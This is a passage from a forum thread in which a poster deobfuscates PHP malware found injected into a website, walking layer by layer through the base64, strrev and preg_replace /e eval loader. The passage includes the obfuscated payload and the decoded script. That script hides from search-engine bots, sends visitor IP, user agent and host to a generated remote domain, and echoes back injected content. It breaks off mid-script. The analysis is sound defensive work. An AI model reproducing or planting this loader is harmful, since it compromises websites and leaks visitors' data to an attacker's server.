HRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";

	$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
	$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
	$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";
	$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";

	$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
	$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);

	$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
	$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];

	$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);

	$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
	$eva1tYldakBcVSir = "";
	$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
	$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
	$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
	$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
	$eva1tYldakBoVS1r = "\x65\143\x72\160";
	$eva1tYldakBcVSir = "";
	$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
	$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
?>

So the first thing I notice is this incredibly long base64-encoded string named $eva1fYlbakBcVSir, which must contain the payload. Next, there are a few levels of indirection to deter the casual reader... but not us. Then I see some string literals, so that's where we'll start:

Code: [Select]

<?php
	$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
	$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
	$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";
	$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";

	// this translates to
	$eva1tYlbakBcVSir = "edolpxe";
	$eva1tYldakBcVSir = "strrev";
	$eva1tYldakBoVS1r = "ecalper_gerp";
	$eva1tYidokBoVSjr = ";))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("1");:@(.+)@ie";
?>

Did you notice anything interesting? There's also a strange little string $eva1tYidokBoVSjr with bits that could be evaluated forwards and backwards.

Code: [Select]

<?php
	$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
	$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);

	// this translates to
	$eva1tYldokBcVSjr=strrev("ecalper_gerp");
	$eva1tYldakBcVSjr=strrev("edolpxe");

	// which translates to
	$eva1tYldokBcVSjr="preg_replace";
	$eva1tYldakBcVSjr="explode";
?>

The next line seems to operate on the payload, splitting it in half:

Code: [Select]

<?php
	$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
	$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];

	// this translates to
	$eva1tYidakBcVSjr = explode("+", $eva1fYlbakBcVSir);
	$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0];
?>

And then we operate on the strange little string we saw earlier:

Code: [Select]

<?php
	$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);

	// this translates to
	$eva1tYidokBcVSjr = explode(":", $eva1tYidokBoVSjr);

	// which translates to
	$eva1tYidokBcVSjr = array(
		';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@',
		'eval("\1");',
		'@(.+)@ie'
	);
?>

The next bit seems to be the kicker, because it operates on the second half of the base64-encoded string and probably evaluates it:

Code: [Select]

<?php
	$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));

	// this translates to
	preg_replace($eva1tYidokBcVSjr[2],$eva1tYidokBcVSjr[1],strrev($eva1tYidokBcVSjr[0]));

	// which translates to
	preg_replace('@(.+)@ie','eval("\1");','@eval(base64_decode($eva1tYidakBcVSjr[1]));');
?>

Shall we take a closer look at the third argument? Let's assume that it gets evaluated:

Code: [Select]

<?php
	eval(base64_decode($eva1tYidakBcVSjr[1]));
?>

... so it seems that the second part of the payload is yet another obfuscated script:

Code: [Select]

<?php if (!isset($evalUdCXTDQERmWnDS)) {function evallwhVfIVnWPbT($s){$e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));$evalUdCXTDQERmWnDS =18792;} ?>

But before we continue, let's see what the rest of the "outer" script does:

Code: [Select]

<?php
	$eva1tYldakBcVSir = "";
	$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
	$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
	$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
	$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
	$eva1tYldakBoVS1r = "\x65\143\x72\160";
	$eva1tYldakBcVSir = "";
	$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
	$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;

	// which translates to
	$eva1tYldakBcVSir = "";
	$eva1tYldakBoVS1r = "edolpxeedolpxe";
	$eva1tYidokBoVSjr = "edolpxe";
	$eva1tYldakBcVSir = "strecrptr";
	$eva1tYlbakBcVSir = "gao[pxe";
	$eva1tYldakBoVS1r = "ecrp";
	$eva1tYldakBcVSir = "";
	$eva1tYldakBoVS1r = "ecrpecrp";
	$eva1tYidokBoVSjr = "gao[pxe";
?>

... nothing useful, apparently, except maybe to confuse us.

Pinako · « **Reply #7 on:** January 14, 2012, 02:05:47 AM »

Our "inner" script looks like this, with some whitespace added:

Code: [Select]

<?php
if (!isset($evalUdCXTDQERmWnDS)) {
	function evallwhVfIVnWPbT($s){
		$e = "";
		for ($a = 0; $a <= strlen($s)-1; $a++ ){
			$e .= $s{strlen($s)-$a-1};
		}
		return($e);
	}
	eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));
	$evalUdCXTDQERmWnDS = 18792;
}
?>

Ah, we have a new function! But don't be fooled: all it does is reverse strings. Can you see how? Anyway, in the rest of the script, we simply reverse a bunch of strings, base64-decode them, and evaluate them. So, it's basically equivalent to:

Code: [Select]

<?php
if (!isset($evalUdCXTDQERmWnDS)) {
	function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {
		return base64_decode($evalIYAcFsoYtAndMk);
	}
	$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
	$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
	$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
	$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
	$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
	eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
	$evalTtDntGsohDPt = array(
		evalMNhPOlTagIOfBSF("R29vZ2xl"),
		evalMNhPOlTagIOfBSF("U2x1cnA="),
		evalMNhPOlTagIOfBSF("TVNOQm90"),
		evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="),
		evalMNhPOlTagIOfBSF("WWFuZGV4"),
		evalMNhPOlTagIOfBSF("UmFtYmxlcg==")
	);
	eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
	$evalgKgHOXrDzX = $dd0();
	if((preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {}
	else {
		@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800);
		$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));
		if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){
			$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch);
			$evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
			echo $evalsssgqulVBTkZLAch;
		}
	}
	$evalUdCXTDQERmWnDS = 18792;
}
?>

So, here's another nested function, which is really just another name for base64_decode. In addition, the script now decodes and evaluates the first half of the payload:

Code: [Select]

<?php
	eval(base64_decode(strrev($eva1tYXdakAcVSjr)));

	// this translates to
	$fri55 = ';$retarn($fif25,$fif52,$fit52';
	$fr55 = '$retrun(';
	$fr52 = 'MKU}f6T4';
	$fri52 = '\x3d\42\x29\51\x3b';
	$fri25 = '\112\x48\112\x6c\144\x48';
	$fr25 = $fri52 . '")' . $fri55;
	$dri25 = "\x24\144\x64\60\x20\75\x20";
	eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163' . $fr25 . '."' . $fri25 . '\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75' . $fr25 . '."' . $fri25 . '\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163' . $fr25 . '."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37' . $fri25 . '\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75' . $fri52 . '");$psi1=' . $fr55 . '"' . $fr52 . 'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").' . $fr55 . "'" . '' . $fr52 . 'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@' . "'" . ').' . $fr55 . "'" . $fr52 . 'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:' . "'" . ').' . $fr55 . "'" . $fr52 . 'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@' . "'" . ');' . $dri25 . '$retun("",$psi1.' . $fr55 . '"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").' . $fr55 . '"OpQyeVL:"));');

	// which translates, after a lot of tedious work, to
	$dd0 = create_function("",'$tsst52 = create_function(\'$return\',\'return "web-".substr($return,0,3);\');$tsst5 = create_function(\'$return\',\'return md5($return);\');$tsst51 = create_function(\'\',\'return mt_rand(1-1,1+1);\');$tsst512 = create_function(\'$create_function\',\'return gethostbyname($create_function.".c"."a");\');return $tsst5($tsst512($tsst52($tsst5($tsst51())))).".com";');
?>

For homework, figure out why the function $dd0() always returns 'f528764d624db129b32c21fbca0cb8d6.com'. For extra credit, derive $dd0 yourself

nb: $dd0 doesn't have to return the same string all the time -- do you know why?

The cleanup continues:

Code: [Select]

<?php
if (!isset($evalUdCXTDQERmWnDS)) {
	$evalamSEiYUdCgdSW="stats";
	$evalTWeirVaqVW="http";
	$evalBdUbtGUDXfB="in";
	$evalQwblCenFzUe="!go!";
	$evalrMsivpMgcfC=$_SERVER["HTTP_USER_AGENT"];
	$dd0 = create_function("",'$tsst52 = create_function(\'$return\',\'return "web-".substr($return,0,3);\');$tsst5 = create_function(\'$return\',\'return md5($return);\');$tsst51 = create_function(\'\',\'return mt_rand(1-1,1+1);\');$tsst512 = create_function(\'$create_function\',\'return gethostbyname($create_function.".c"."a");\');return $tsst5($tsst512($tsst52($tsst5($tsst51())))).".com";');
	$evalTtDntGsohDPt = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
	function evalWEMBIkqYOIIGcLBn($s) {
		return @file_get_contents($s);
	}
	$evalgKgHOXrDzX = $dd0();
	if((preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {}
	else {
		@setcookie($evalamSEiYUdCgdSW,md5("stats"),time()+10800);
		$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW."://".$evalgKgHOXrDzX."/".$evalBdUbtGUDXfB.".php?i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($evalrMsivpMgcfC)."&h=".urlencode($_SERVER["HTTP_HOST"]));
		if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){
			$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch);
			$evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
			echo $evalsssgqulVBTkZLAch;
		}
	}
	$evalUdCXTDQERmWnDS = 18792;
}
?>

Finally, we have the following script:

Code: [Select]

<?php
if (!isset($evalUdCXTDQERmWnDS)) {
